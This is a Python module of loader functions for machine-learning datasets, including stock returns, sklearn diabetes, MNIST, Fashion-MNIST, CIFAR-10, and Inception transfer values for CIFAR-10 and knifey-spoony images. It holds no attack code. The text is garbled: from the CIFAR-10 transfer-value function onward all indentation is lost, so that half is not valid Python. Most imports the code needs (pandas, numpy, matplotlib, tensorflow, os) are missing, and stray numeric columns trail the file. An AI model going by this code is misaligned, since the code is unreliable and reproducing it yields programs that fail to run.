from inception import transfer_values_cache # module from Hvass Labs
def load_two_asset_daily_return_data():
    """Load 2017 daily returns for SPY and WMT from local CSV files.

    Reads "./data/dow30/<TICKER>.CSV" for each ticker, joins each price
    field onto a full 2017 calendar-date index, drops dates on which the
    benchmark (SPY) did not trade, and computes daily percentage returns
    from the "Adj Close" column.

    Returns:
        tuple: (spy, wmt) -- float32 column vectors of shape (n_days - 1, 1);
        the first pct_change row (NaN) is dropped.
    """
    start = "2017-01-01"
    end = "2017-12-31"
    dates = pd.date_range(start, end)
    ticker_list = ["SPY", "WMT"]
    benchmark = "SPY"
    data_dir = "./data/dow30"
    # Collect one joined DataFrame per price field in a dict instead of the
    # previous chain of `if data_type == ...` assignments, which left five
    # unused locals (df_open, df_high, df_low, df_close, df_volume).
    frames = {}
    for data_type in ["Open", "High", "Low", "Close", "Adj Close", "Volume"]:
        df = pd.DataFrame(index=dates)
        for ticker in ticker_list:
            csv_file_path = os.path.join(data_dir, ticker + ".CSV")
            df_temp = pd.read_csv(csv_file_path,
                                  index_col="Date",
                                  parse_dates=True,
                                  usecols=["Date", data_type],
                                  na_values=["null"])
            df_temp = df_temp.rename(columns={data_type: ticker})
            df = df.join(df_temp)
            if ticker == benchmark:
                # Keep only calendar dates on which the benchmark traded.
                df = df.dropna(subset=[benchmark])
        frames[data_type] = df
    df_daily_return = frames["Adj Close"].pct_change()
    spy = np.array(df_daily_return.SPY).reshape(-1, 1).astype(np.float32)[1:]
    wmt = np.array(df_daily_return.WMT).reshape(-1, 1).astype(np.float32)[1:]
    data = (spy, wmt)
    return data
if __name__ == '__main__':
    # Smoke test: load the two return series, report their types and shapes,
    # then scatter-plot SPY daily returns against WMT daily returns.
    print("load_two_asset_daily_return_data")
    print()
    spy, wmt = load_two_asset_daily_return_data()
    for series in (spy, wmt):
        print(type(series))
    for series in (spy, wmt):
        print(series.shape)
    plt.plot(spy, wmt, 'o')
    plt.xlabel('SPY daily return')
    plt.ylabel('WMT daily return')
    plt.show()
def load_2_factor_diabetes_data():
    """Return the sklearn diabetes set restricted to features 2 and 3.

    The last 20 samples form the test split; targets are float32 column
    vectors and inputs are float32 (n, 2) matrices.

    Returns:
        tuple: (x_train, y_train, x_test, y_test)
    """
    diabetes = datasets.load_diabetes()
    features = diabetes.data[:, 2:4].astype(np.float32)  # keep two features only
    targets = diabetes.target.reshape(-1, 1).astype(np.float32)
    x_train, x_test = features[:-20, :], features[-20:, :]
    y_train, y_test = targets[:-20], targets[-20:]
    return (x_train, y_train, x_test, y_test)
if __name__ == '__main__':
    # Smoke test for load_2_factor_diabetes_data(): print shapes, dtypes,
    # types, and value ranges of the returned splits.
    print("load_2_factor_diabetes_data")
    print()
    data = load_2_factor_diabetes_data()
    # BUG FIX: the loader returns (x_train, y_train, x_test, y_test); the
    # previous unpacking order (x_train, x_test, y_train, y_test) mislabeled
    # every value printed below.
    x_train, y_train, x_test, y_test = data
    print("x_train.shape : ", x_train.shape)
    print("x_test.shape : ", x_test.shape)
    print("y_train.shape : ", y_train.shape)
    print("y_test.shape : ", y_test.shape)
    print()
    print("x_train.dtype : ", x_train.dtype)
    print("x_test.dtype : ", x_test.dtype)
    print("y_train.dtype : ", y_train.dtype)
    print("y_test.dtype : ", y_test.dtype)  # fixed label typo ("dtypee")
    print()
    print("type(x_train) : ", type(x_train))
    print("type(x_test) : ", type(x_test))
    print("type(y_train) : ", type(y_train))
    print("type(y_test) : ", type(y_test))
    print()
    print("min and max of x_train : ", np.min(x_train), np.max(x_train))
    print("min and max of x_test : ", np.min(x_test), np.max(x_test))
    print("min and max of y_train : ", np.min(y_train), np.max(y_train))
    print("min and max of y_test : ", np.min(y_test), np.max(y_test))
    print()
def load_noisy_bowl():
    """Sample z = x**2 + y**2 on a 40x40 grid over [-1, 1) with Gaussian noise.

    The noise is reproducible (np.random.seed(1)).

    Returns:
        numpy.ndarray: float32 array of shape (1600, 3) whose columns are the
        flattened x, y, and noisy z values.
    """
    axis = np.arange(-1, 1, 0.05)
    grid_x, grid_y = np.meshgrid(axis, axis)
    bowl = grid_x ** 2 + grid_y ** 2
    np.random.seed(1)
    noise = np.random.randn(grid_x.shape[0], grid_x.shape[1])
    noisy = bowl + 0.3 * noise
    columns = [g.reshape([-1, 1]) for g in (grid_x, grid_y, noisy)]
    return np.hstack(columns).astype(np.float32)
if __name__ == '__main__':
    # Smoke test for load_noisy_bowl(): reshape the (1600, 3) sample back to
    # its 40x40 grid and render a 3-D surface.
    print("load_noisy_bowl")
    print()
    data = load_noisy_bowl()
    # Columns are the flattened x, y, z values of a 40x40 meshgrid sample.
    x_grid = data[:, 0].reshape(40, 40)
    y_grid = data[:, 1].reshape(40, 40)
    z_grid = data[:, 2].reshape(40, 40)
    fig = plt.figure()
    # NOTE(review): fig.gca(projection='3d') was removed in matplotlib >= 3.6;
    # newer versions need fig.add_subplot(projection='3d') -- confirm pinned version.
    ax = fig.gca(projection='3d')
    ax.plot_surface(x_grid, y_grid, z_grid, rstride=1, cstride=1,
                    cmap=cm.coolwarm, linewidth=0, antialiased=False)
    ax.set_title('Noisy Bowl')
    ax.set_xlabel('X')
    ax.set_ylabel('Y')
    ax.set_zlabel('Z')
    ax.set_xlim([-1.5, 1.5])
    ax.set_ylim([-1.5, 1.5])
    ax.set_zlim([-1.0, 2.5])
    plt.show()
def load_noisy_bowl_for_linear_regression():
    """Return the noisy-bowl sample split into regression inputs and targets.

    Delegates to load_noisy_bowl() instead of duplicating its grid/noise
    logic line for line (same seed, identical values): the first two columns
    (x, y) become x_train and the noisy z column becomes y_train.

    Returns:
        tuple: (x_train, y_train) -- float32 arrays of shape (1600, 2) and
        (1600, 1).
    """
    sample = load_noisy_bowl()
    x_train = sample[:, 0:2]
    y_train = sample[:, 2:3]
    return (x_train, y_train)
if __name__ == '__main__':
    # Smoke test for load_noisy_bowl_for_linear_regression(): reassemble the
    # (x, y) inputs and z targets into 40x40 grids and render a 3-D surface.
    print("load_noisy_bowl_for_linear_regression")
    print()
    x_train, y_train = load_noisy_bowl_for_linear_regression()
    x_grid = x_train[:, 0].reshape(40, 40)
    y_grid = x_train[:, 1].reshape(40, 40)
    z_grid = y_train.reshape(40, 40)
    fig = plt.figure()
    # NOTE(review): fig.gca(projection='3d') was removed in matplotlib >= 3.6;
    # newer versions need fig.add_subplot(projection='3d') -- confirm pinned version.
    ax = fig.gca(projection='3d')
    ax.plot_surface(x_grid, y_grid, z_grid, rstride=1, cstride=1,
                    cmap=cm.coolwarm, linewidth=0, antialiased=False)
    ax.set_title('Noisy Bowl')
    ax.set_xlabel('X')
    ax.set_ylabel('Y')
    ax.set_zlabel('Z')
    ax.set_xlim([-1.5, 1.5])
    ax.set_ylim([-1.5, 1.5])
    ax.set_zlim([-1.0, 2.5])
    plt.show()
def load_mnist():
    """Load MNIST scaled to [0, 1] as float32 (N, 28, 28, 1) images.

    Returns:
        tuple: (x_train, x_test, y_train, y_test, y_train_cls, y_test_cls)
        where y_train/y_test are one-hot float32 matrices and the *_cls
        arrays are the original int32 class labels.
    """
    (x_train, y_train), (x_test, y_test) = tf.keras.datasets.mnist.load_data()
    x_train = (x_train / 255.0).reshape((-1, 28, 28, 1)).astype(np.float32)
    x_test = (x_test / 255.0).reshape((-1, 28, 28, 1)).astype(np.float32)
    # Preserve the integer labels before replacing y_* with one-hot encodings.
    y_train_cls = deepcopy(y_train).astype(np.int32)
    y_test_cls = deepcopy(y_test).astype(np.int32)
    one_hot = np.eye(10)
    y_train = one_hot[y_train].astype(np.float32)
    y_test = one_hot[y_test].astype(np.float32)
    return (x_train, x_test, y_train, y_test, y_train_cls, y_test_cls)
if __name__ == '__main__':
    # Smoke test for load_mnist(): print shapes, dtypes, types, and value
    # ranges of every returned array.
    print("load_mnist")
    print()
    data = load_mnist()
    x_train, x_test, y_train, y_test, y_train_cls, y_test_cls = data
    print("x_train.shape : ", x_train.shape)
    print("x_test.shape : ", x_test.shape)
    print("y_train.shape : ", y_train.shape)
    print("y_test.shape : ", y_test.shape)
    print("y_train_cls.shape : ", y_train_cls.shape)
    print("y_test_cls.shape : ", y_test_cls.shape)
    print()
    print("x_train.dtype : ", x_train.dtype)
    print("x_test.dtype : ", x_test.dtype)
    print("y_train.dtype : ", y_train.dtype)
    print("y_test.dtype : ", y_test.dtype)  # fixed label typo ("dtypee")
    print("y_train_cls.dtype : ", y_train_cls.dtype)
    print("y_test_cls.dtype : ", y_test_cls.dtype)
    print()
    print("type(x_train) : ", type(x_train))
    print("type(x_test) : ", type(x_test))
    print("type(y_train) : ", type(y_train))
    print("type(y_test) : ", type(y_test))
    print("type(y_train_cls) : ", type(y_train_cls))
    print("type(y_test_cls) : ", type(y_test_cls))
    print()
    print("min and max of x_train : ", np.min(x_train), np.max(x_train))
    print("min and max of x_test : ", np.min(x_test), np.max(x_test))
    print("min and max of y_train : ", np.min(y_train), np.max(y_train))
    print("min and max of y_test : ", np.min(y_test), np.max(y_test))
    print("min and max of y_train_cls : ", np.min(y_train_cls), np.max(y_train_cls))
    print("min and max of y_test_cls : ", np.min(y_test_cls), np.max(y_test_cls))
    print()
def load_mnist_flat():
    """Load MNIST scaled to [0, 1] as float32 flattened (N, 784) vectors.

    Delegates to load_mnist() instead of duplicating its whole body (the two
    functions differed only in the reshape); the image tensors are then
    flattened, which yields byte-identical values in C order.

    Returns:
        tuple: (x_train, x_test, y_train, y_test, y_train_cls, y_test_cls)
        with one-hot float32 y_* matrices and int32 *_cls labels.
    """
    x_train, x_test, y_train, y_test, y_train_cls, y_test_cls = load_mnist()
    x_train = x_train.reshape((-1, 784))
    x_test = x_test.reshape((-1, 784))
    return (x_train, x_test, y_train, y_test, y_train_cls, y_test_cls)
if __name__ == '__main__':
    # Smoke test for load_mnist_flat(): print shapes, dtypes, types, and
    # value ranges of every returned array.
    print("load_mnist_flat")
    print()
    data = load_mnist_flat()
    x_train, x_test, y_train, y_test, y_train_cls, y_test_cls = data
    print("x_train.shape : ", x_train.shape)
    print("x_test.shape : ", x_test.shape)
    print("y_train.shape : ", y_train.shape)
    print("y_test.shape : ", y_test.shape)
    print("y_train_cls.shape : ", y_train_cls.shape)
    print("y_test_cls.shape : ", y_test_cls.shape)
    print()
    print("x_train.dtype : ", x_train.dtype)
    print("x_test.dtype : ", x_test.dtype)
    print("y_train.dtype : ", y_train.dtype)
    print("y_test.dtype : ", y_test.dtype)  # fixed label typo ("dtypee")
    print("y_train_cls.dtype : ", y_train_cls.dtype)
    print("y_test_cls.dtype : ", y_test_cls.dtype)
    print()
    print("type(x_train) : ", type(x_train))
    print("type(x_test) : ", type(x_test))
    print("type(y_train) : ", type(y_train))
    print("type(y_test) : ", type(y_test))
    print("type(y_train_cls) : ", type(y_train_cls))
    print("type(y_test_cls) : ", type(y_test_cls))
    print()
    print("min and max of x_train : ", np.min(x_train), np.max(x_train))
    print("min and max of x_test : ", np.min(x_test), np.max(x_test))
    print("min and max of y_train : ", np.min(y_train), np.max(y_train))
    print("min and max of y_test : ", np.min(y_test), np.max(y_test))
    print("min and max of y_train_cls : ", np.min(y_train_cls), np.max(y_train_cls))
    print("min and max of y_test_cls : ", np.min(y_test_cls), np.max(y_test_cls))
    print()
def load_fashion_mnist():
    """Load Fashion-MNIST scaled to [0, 1] as float32 (N, 28, 28, 1) images.

    Returns:
        tuple: (x_train, x_test, y_train, y_test, y_train_cls, y_test_cls,
        class_names) where y_train/y_test are one-hot float32 matrices, the
        *_cls arrays are int32 labels, and class_names maps a label index to
        its garment name.
    """
    (x_train, y_train), (x_test, y_test) = tf.keras.datasets.fashion_mnist.load_data()
    x_train = (x_train / 255.0).reshape((-1, 28, 28, 1)).astype(np.float32)
    x_test = (x_test / 255.0).reshape((-1, 28, 28, 1)).astype(np.float32)
    # Preserve the integer labels before replacing y_* with one-hot encodings.
    y_train_cls = deepcopy(y_train).astype(np.int32)
    y_test_cls = deepcopy(y_test).astype(np.int32)
    one_hot = np.eye(10)
    y_train = one_hot[y_train].astype(np.float32)
    y_test = one_hot[y_test].astype(np.float32)
    class_names = ["T-shirt/top", "Trouser", "Pullover", "Dress", "Coat", "Sandal", "Shirt", "Sneaker", "Bag", "Ankle boot"]
    return (x_train, x_test, y_train, y_test, y_train_cls, y_test_cls, class_names)
if __name__ == '__main__':
    # Smoke test for load_fashion_mnist(): print class names plus the shapes,
    # dtypes, types, and value ranges of every returned array.
    print("load_fashion_mnist")
    print()
    data = load_fashion_mnist()
    x_train, x_test, y_train, y_test, y_train_cls, y_test_cls, class_names = data
    print("class_names : ", class_names)
    print()
    print("x_train.shape : ", x_train.shape)
    print("x_test.shape : ", x_test.shape)
    print("y_train.shape : ", y_train.shape)
    print("y_test.shape : ", y_test.shape)
    print("y_train_cls.shape : ", y_train_cls.shape)
    print("y_test_cls.shape : ", y_test_cls.shape)
    print()
    print("x_train.dtype : ", x_train.dtype)
    print("x_test.dtype : ", x_test.dtype)
    print("y_train.dtype : ", y_train.dtype)
    print("y_test.dtype : ", y_test.dtype)  # fixed label typo ("dtypee")
    print("y_train_cls.dtype : ", y_train_cls.dtype)
    print("y_test_cls.dtype : ", y_test_cls.dtype)
    print()
    print("type(x_train) : ", type(x_train))
    print("type(x_test) : ", type(x_test))
    print("type(y_train) : ", type(y_train))
    print("type(y_test) : ", type(y_test))
    print("type(y_train_cls) : ", type(y_train_cls))
    print("type(y_test_cls) : ", type(y_test_cls))
    print()
    print("min and max of x_train : ", np.min(x_train), np.max(x_train))
    print("min and max of x_test : ", np.min(x_test), np.max(x_test))
    print("min and max of y_train : ", np.min(y_train), np.max(y_train))
    print("min and max of y_test : ", np.min(y_test), np.max(y_test))
    print("min and max of y_train_cls : ", np.min(y_train_cls), np.max(y_train_cls))
    print("min and max of y_test_cls : ", np.min(y_test_cls), np.max(y_test_cls))
    print()
def load_fashion_mnist_flat():
    """Load Fashion-MNIST scaled to [0, 1] as float32 flattened (N, 784) vectors.

    Delegates to load_fashion_mnist() instead of duplicating its whole body
    (the two functions differed only in the reshape); flattening the image
    tensors yields byte-identical values in C order.

    Returns:
        tuple: (x_train, x_test, y_train, y_test, y_train_cls, y_test_cls,
        class_names).
    """
    x_train, x_test, y_train, y_test, y_train_cls, y_test_cls, class_names = load_fashion_mnist()
    x_train = x_train.reshape((-1, 784))
    x_test = x_test.reshape((-1, 784))
    return (x_train, x_test, y_train, y_test, y_train_cls, y_test_cls, class_names)
if __name__ == '__main__':
    # Smoke test for load_fashion_mnist_flat(): print class names plus the
    # shapes, dtypes, types, and value ranges of every returned array.
    print("load_fashion_mnist_flat")
    print()
    data = load_fashion_mnist_flat()
    x_train, x_test, y_train, y_test, y_train_cls, y_test_cls, class_names = data
    print("class_names : ", class_names)
    print()
    print("x_train.shape : ", x_train.shape)
    print("x_test.shape : ", x_test.shape)
    print("y_train.shape : ", y_train.shape)
    print("y_test.shape : ", y_test.shape)
    print("y_train_cls.shape : ", y_train_cls.shape)
    print("y_test_cls.shape : ", y_test_cls.shape)
    print()
    print("x_train.dtype : ", x_train.dtype)
    print("x_test.dtype : ", x_test.dtype)
    print("y_train.dtype : ", y_train.dtype)
    print("y_test.dtype : ", y_test.dtype)  # fixed label typo ("dtypee")
    print("y_train_cls.dtype : ", y_train_cls.dtype)
    print("y_test_cls.dtype : ", y_test_cls.dtype)
    print()
    print("type(x_train) : ", type(x_train))
    print("type(x_test) : ", type(x_test))
    print("type(y_train) : ", type(y_train))
    print("type(y_test) : ", type(y_test))
    print("type(y_train_cls) : ", type(y_train_cls))
    print("type(y_test_cls) : ", type(y_test_cls))
    print()
    print("min and max of x_train : ", np.min(x_train), np.max(x_train))
    print("min and max of x_test : ", np.min(x_test), np.max(x_test))
    print("min and max of y_train : ", np.min(y_train), np.max(y_train))
    print("min and max of y_test : ", np.min(y_test), np.max(y_test))
    print("min and max of y_train_cls : ", np.min(y_train_cls), np.max(y_train_cls))
    print("min and max of y_test_cls : ", np.min(y_test_cls), np.max(y_test_cls))
    print()
def load_cifar10():
    """Download (if needed) and load CIFAR-10 via the Hvass-Labs cifar10 module.

    Data is fetched from https://www.cs.toronto.edu/~kriz/cifar-10-python.tar.gz
    into "data/CIFAR-10/" on first use.

    Returns:
        tuple: (x_train, y_train_cls, y_train, x_test, y_test_cls, y_test,
        class_names) -- float32 images/one-hot labels, int32 class labels.
    """
    # makedirs with exist_ok creates "data" and "data/CIFAR-10" in one call,
    # replacing the previous chain of isdir/mkdir checks.
    os.makedirs("data/CIFAR-10", exist_ok=True)
    cifar10.data_path = "data/CIFAR-10/"
    cifar10.maybe_download_and_extract()
    # load data
    x_train, y_train_cls, y_train = cifar10.load_training_data()
    x_test, y_test_cls, y_test = cifar10.load_test_data()
    class_names = cifar10.load_class_names()
    x_train = x_train.astype(np.float32)
    y_train_cls = y_train_cls.astype(np.int32)
    y_train = y_train.astype(np.float32)
    x_test = x_test.astype(np.float32)
    y_test_cls = y_test_cls.astype(np.int32)
    y_test = y_test.astype(np.float32)
    data = (x_train, y_train_cls, y_train, x_test, y_test_cls, y_test, class_names)
    return data
if __name__ == '__main__':
    # Smoke test for load_cifar10(): print class names plus the shapes,
    # dtypes, types, and value ranges of every returned array.
    print("load_cifar10")
    print()
    data = load_cifar10()
    x_train, y_train_cls, y_train, x_test, y_test_cls, y_test, class_names = data
    print("class_names : ", class_names)
    print()
    print("x_train.shape : ", x_train.shape)
    print("x_test.shape : ", x_test.shape)
    print("y_train.shape : ", y_train.shape)
    print("y_test.shape : ", y_test.shape)
    print("y_train_cls.shape : ", y_train_cls.shape)
    print("y_test_cls.shape : ", y_test_cls.shape)
    print()
    print("x_train.dtype : ", x_train.dtype)
    print("x_test.dtype : ", x_test.dtype)
    print("y_train.dtype : ", y_train.dtype)
    print("y_test.dtype : ", y_test.dtype)  # fixed label typo ("dtypee")
    print("y_train_cls.dtype : ", y_train_cls.dtype)
    print("y_test_cls.dtype : ", y_test_cls.dtype)
    print()
    print("type(x_train) : ", type(x_train))
    print("type(x_test) : ", type(x_test))
    print("type(y_train) : ", type(y_train))
    print("type(y_test) : ", type(y_test))
    print("type(y_train_cls) : ", type(y_train_cls))
    print("type(y_test_cls) : ", type(y_test_cls))
    print()
    print("min and max of x_train : ", np.min(x_train), np.max(x_train))
    print("min and max of x_test : ", np.min(x_test), np.max(x_test))
    print("min and max of y_train : ", np.min(y_train), np.max(y_train))
    print("min and max of y_test : ", np.min(y_test), np.max(y_test))
    print("min and max of y_train_cls : ", np.min(y_train_cls), np.max(y_train_cls))
    print("min and max of y_test_cls : ", np.min(y_test_cls), np.max(y_test_cls))
    print()
def load_inception_model():
    """Download (if needed) and construct the Hvass-Labs Inception model.

    Also ensures the working directories used by this module exist.

    Returns:
        inception.Inception: the loaded model instance.
    """
    # makedirs with exist_ok replaces the previous chain of isdir/mkdir
    # checks and also creates parents ("data" before "data/CIFAR-10").
    for directory in ("data", "data/CIFAR-10", "inception", "img", "graphs"):
        os.makedirs(directory, exist_ok=True)
    inception.maybe_download()  # download inception data (85MB) if not exist in inception directory
    model = inception.Inception()  # load inception model
    return model
if __name__ == '__main__':
    # Demo for the Inception model: classify two sample images and show how
    # the model resizes its input.
    print("load_inception_model")
    print()
    def classify(image_path):
        """Display the image at image_path, classify it with the Inception
        model, and print the top-10 predictions."""
        display(Image(image_path))
        plt.close('all') # display image in image_path
        pred = model.classify(image_path=image_path) # classify using inception model
        model.print_scores(pred=pred, k=10, only_first_name=True) # print top 10 predictions
    def plot_resized_image(image_path):
        """Plot the resized image the Inception model actually consumes for
        the image at image_path."""
        resized_image = model.get_resized_image(image_path=image_path) # get resized image
        plt.imshow(resized_image, interpolation='nearest')
        plt.show()
        plt.close('all') # plot resized image
    # `model` is a module-level name read by the two closures above.
    model = load_inception_model()
    print("Display, Classify, and Print Top 10 Predictions")
    # NOTE(review): these paths use "images/..." while load_inception_model()
    # creates an "img" directory -- confirm where the sample images live.
    classify(image_path="images/cropped_panda.jpg")
    plt.close('all')
    classify(image_path="images/parrot.jpg")
    plt.close('all')
    print("Plot Resized Images")
    plot_resized_image(image_path="images/parrot.jpg")
    plt.close('all')
    plot_resized_image(image_path="images/elon_musk_100x100.jpg")
    plt.close('all')
def load_cifar10_transfer_values():
# load inception model
model = load_inception_model()
# load cifar10 dataset
data = load_cifar10()
x_train, y_train_cls, y_train, x_test, y_test_cls, y_test, cls_names = data
# compute, cache, and read transfer-values
data_dir = "data/CIFAR-10/"
file_path_cache_train = os.path.join(data_dir, 'inception_cifar10_train.pkl')
file_path_cache_test = os.path.join(data_dir, 'inception_cifar10_test.pkl')
print("Processing Inception transfer-values for training-images ...")
# Scale images because Inception needs pixels to be between 0 and 255,
# while the CIFAR-10 functions return pixels between 0.0 and 1.0
images_scaled = x_train * 255.0
# If transfer-values have already been calculated then reload them,
# otherwise calculate them and save them to a cache-file.
x_train_transfer_values = transfer_values_cache(
cache_path=file_path_cache_train,
images=images_scaled,
model=model)
print("Processing Inception transfer-values for test-images ...")
# Scale images because Inception needs pixels to be between 0 and 255,
# while the CIFAR-10 functions return pixels between 0.0 and 1.0
images_scaled = x_test * 255.0
# If transfer-values have already been calculated then reload them,
# otherwise calculate them and save them to a cache-file.
x_test_transfer_values = transfer_values_cache(
cache_path=file_path_cache_test,
images=images_scaled,
model=model)
data = (x_train, y_train_cls, y_train, x_test, y_test_cls, y_test, cls_names, x_train_transfer_values, x_test_transfer_values)
return data
if __name__ == '__main__':
print("load_cifar10_transfer_values")
print()
data = load_cifar10_transfer_values()
x_train, y_train_cls, y_train, x_test, y_test_cls, y_test, cls_names, x_train_transfer_values, x_test_transfer_values = data
print("x_train.shape : ", x_train.shape)
print("x_train_transfer_values.shape : ", x_train_transfer_values.shape)
print("x_test.shape : ", x_test.shape)
print("x_test_transfer_values.shape : ", x_test_transfer_values.shape)
print("y_train.shape : ", y_train.shape)
print("y_test.shape : ", y_test.shape)
print("y_train_cls.shape : ", y_train_cls.shape)
print("y_test_cls.shape : ", y_test_cls.shape)
print()
print("x_train.dtype : ", x_train.dtype)
print("x_train_transfer_values.dtype : ", x_train_transfer_values.dtype)
print("x_test.dtype : ", x_test.dtype)
print("x_test_transfer_values.dtype : ", x_test_transfer_values.dtype)
print("y_train.dtype : ", y_train.dtype)
print("y_test.dtypee : ", y_test.dtype)
print("y_train_cls.dtype : ", y_train_cls.dtype)
print("y_test_cls.dtype : ", y_test_cls.dtype)
print()
print("type(x_train) : ", type(x_train))
print("type(x_train_transfer_values) : ", type(x_train_transfer_values))
print("type(x_test) : ", type(x_test))
print("type(x_test_transfer_values) : ", type(x_test_transfer_values))
print("type(y_train) : ", type(y_train))
print("type(y_test) : ", type(y_test))
print("type(y_train_cls) : ", type(y_train_cls))
print("type(y_test_cls) : ", type(y_test_cls))
print()
print("min and max of x_train : ", np.min(x_train), np.max(x_train))
print("min and max of x_train_transfer_values : ", np.min(x_train_transfer_values), np.max(x_train_transfer_values))
print("min and max of x_test : ", np.min(x_test), np.max(x_test))
print("min and max of x_test_transfer_values : ", np.min(x_test_transfer_values), np.max(x_test_transfer_values))
print("min and max of y_train : ", np.min(y_train), np.max(y_train))
print("min and max of y_test : ", np.min(y_test), np.max(y_test))
print("min and max of y_train_cls : ", np.min(y_train_cls), np.max(y_train_cls))
print("min and max of y_test_cls : ", np.min(y_test_cls), np.max(y_test_cls))
print()
print('cls_names')
print(cls_names)
print()
def load_knifey():
knifey.maybe_download_and_extract()
dataset = knifey.load()
x_train, y_train_cls, y_train = dataset.get_training_set()
x_test, y_test_cls, y_test = dataset.get_test_set()
cls_names = dataset.class_names
y_train = y_train.astype(np.float32)
y_test = y_test.astype(np.float32)
y_train_cls = y_train_cls.astype(np.int32)
y_test_cls = y_test_cls.astype(np.int32)
data = (x_train, y_train_cls, y_train, x_test, y_test_cls, y_test, cls_names)
return data
if __name__ == '__main__':
print("load_knifey")
print()
def load_images(image_paths):
# Load the images from disk.
images = [imread(path) for path in image_paths]
# Convert to a numpy array and return it.
return np.asarray(images)
def plot_images(images, cls_true, cls_pred=None, smooth=True):
assert len(images) == len(cls_true)
# Create figure with sub-plots.
fig, axes = plt.subplots(3, 3)
# Adjust vertical spacing.
if cls_pred is None:
hspace = 0.3
else:
hspace = 0.6
fig.subplots_adjust(hspace=hspace, wspace=0.3)
# Interpolation type.
if smooth:
interpolation = 'spline16'
else:
interpolation = 'nearest'
for i, ax in enumerate(axes.flat):
# There may be less than 9 images, ensure it doesn't crash.
if i < len(images):
# Plot image.
ax.imshow(images[i],
interpolation=interpolation)
# Name of the true class.
cls_true_name = cls_names[cls_true[i]]
# Show true and predicted classes.
if cls_pred is None:
xlabel = "True: {0}".format(cls_true_name)
else:
# Name of the predicted class.
cls_pred_name = cls_names[cls_pred[i]]
xlabel = "True: {0}\nPred: {1}".format(cls_true_name, cls_pred_name)
# Show the classes as the label on the x-axis.
ax.set_xlabel(xlabel)
# Remove ticks from the plot.
ax.set_xticks([])
ax.set_yticks([])
# Ensure the plot is shown correctly with multiple plots
# in a single Notebook cell.
plt.show()
plt.close('all')
data = load_knifey()
x_train, y_train_cls, y_train, x_test, y_test_cls, y_test, cls_names = data
#print("x_train.shape : ", x_train.shape)
#print("x_test.shape : ", x_test.shape)
print("y_train.shape : ", y_train.shape)
print("y_test.shape : ", y_test.shape)
print("y_train_cls.shape : ", y_train_cls.shape)
print("y_test_cls.shape : ", y_test_cls.shape)
print()
#print("x_train.dtype : ", x_train.dtype)
#print("x_test.dtype : ", x_test.dtype)
print("y_train.dtype : ", y_train.dtype)
print("y_test.dtypee : ", y_test.dtype)
print("y_train_cls.dtype : ", y_train_cls.dtype)
print("y_test_cls.dtype : ", y_test_cls.dtype)
print()
print("type(x_train) : ", type(x_train))
print("type(x_test) : ", type(x_test))
print("type(y_train) : ", type(y_train))
print("type(y_test) : ", type(y_test))
print("type(y_train_cls) : ", type(y_train_cls))
print("type(y_test_cls) : ", type(y_test_cls))
print()
#print("min and max of x_train : ", np.min(x_train), np.max(x_train))
#print("min and max of x_test : ", np.min(x_test), np.max(x_test))
print("min and max of y_train : ", np.min(y_train), np.max(y_train))
print("min and max of y_test : ", np.min(y_test), np.max(y_test))
print("min and max of y_train_cls : ", np.min(y_train_cls), np.max(y_train_cls))
print("min and max of y_test_cls : ", np.min(y_test_cls), np.max(y_test_cls))
print()
print("x_train[0] is not a np.ndarray but a path of an image : ", x_train[0])
print("x_test[0] is not a np.ndarray but a path of an image : ", x_test[0])
print()
print("cls_names : ", cls_names)
print()
images = load_images(image_paths=x_test[0:9])
cls_true = y_test_cls[0:9]
plot_images(images=images, cls_true=cls_true, smooth=True)
print("images.shape : ", images.shape)
print()
def load_knifey_transfer_values():
# load inception model
model = load_inception_model()
# load cifar10 dataset
data = load_knifey()
x_train, y_train_cls, y_train, x_test, y_test_cls, y_test, cls_names = data
# compute, cache, and read transfer-values
data_dir = "data/knifey-spoony/"
file_path_cache_train = os.path.join(data_dir, 'inception-knifey-train.pkl')
file_path_cache_test = os.path.join(data_dir, 'inception-knifey-test.pkl')
print("Processing Inception transfer-values for training-images ...")
# If transfer-values have already been calculated then reload them,
# otherwise calculate them and save them to a cache-file.
x_train_transfer_values = transfer_values_cache(
cache_path=file_path_cache_train,
image_paths=x_train,
model=model)
print("Processing Inception transfer-values for test-images ...")
# If transfer-values have already been calculated then reload them,
# otherwise calculate them and save them to a cache-file.
x_test_transfer_values = transfer_values_cache(
cache_path=file_path_cache_test,
image_paths=x_test,
model=model)
data = (x_train, y_train_cls, y_train, x_test, y_test_cls, y_test, cls_names, x_train_transfer_values, x_test_transfer_values)
return data
if __name__ == '__main__':
print("Data Loading knifey Transfer Values")
print()
data = load_knifey_transfer_values()
x_train, y_train_cls, y_train, x_test, y_test_cls, y_test, cls_names, x_train_transfer_values, x_test_transfer_values = data
#print("x_train.shape : ", x_train.shape)
print("x_train_transfer_values.shape : ", x_train_transfer_values.shape)
#print("x_test.shape : ", x_test.shape)
print("x_test_transfer_values.shape : ", x_test_transfer_values.shape)
print("y_train.shape : ", y_train.shape)
print("y_test.shape : ", y_test.shape)
print("y_train_cls.shape : ", y_train_cls.shape)
print("y_test_cls.shape : ", y_test_cls.shape)
print()
#print("x_train.dtype : ", x_train.dtype)
print("x_train_transfer_values.dtype : ", x_train_transfer_values.dtype)
#print("x_test.dtype : ", x_test.dtype)
print("x_test_transfer_values.dtype : ", x_test_transfer_values.dtype)
print("y_train.dtype : ", y_train.dtype)
print("y_test.dtypee : ", y_test.dtype)
print("y_train_cls.dtype : ", y_train_cls.dtype)
print("y_test_cls.dtype : ", y_test_cls.dtype)
print()
print("type(x_train) : ", type(x_train))
print("type(x_train_transfer_values) : ", type(x_train_transfer_values))
print("type(x_test) : ", type(x_test))
print("type(x_test_transfer_values) : ", type(x_test_transfer_values))
print("type(y_train) : ", type(y_train))
print("type(y_test) : ", type(y_test))
print("type(y_train_cls) : ", type(y_train_cls))
print("type(y_test_cls) : ", type(y_test_cls))
print()
#print("min and max of x_train : ", np.min(x_train), np.max(x_train))
print("min and max of x_train_transfer_values : ", np.min(x_train_transfer_values), np.max(x_train_transfer_values))
#print("min and max of x_test : ", np.min(x_test), np.max(x_test))
print("min and max of x_test_transfer_values : ", np.min(x_test_transfer_values), np.max(x_test_transfer_values))
print("min and max of y_train : ", np.min(y_train), np.max(y_train))
print("min and max of y_test : ", np.min(y_test), np.max(y_test))
print("min and max of y_train_cls : ", np.min(y_train_cls), np.max(y_train_cls))
print("min and max of y_test_cls : ", np.min(y_test_cls), np.max(y_test_cls))
print()
print("x_train[0] is not a np.ndarray but a path of an image : ", x_train[0])
print("x_test[0] is not a np.ndarray but a path of an image : ", x_test[0])
print()
print('cls_names')
print(cls_names)
print()
| 36.622538
| 130
| 0.622322
